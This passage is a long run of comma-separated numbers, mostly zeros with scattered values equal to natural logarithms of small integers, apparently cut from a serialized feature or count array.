0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 1.0986122886681098, 0.0, 2.0794415416798357, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.3862943611198906, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453,\n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.1354942159291497,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 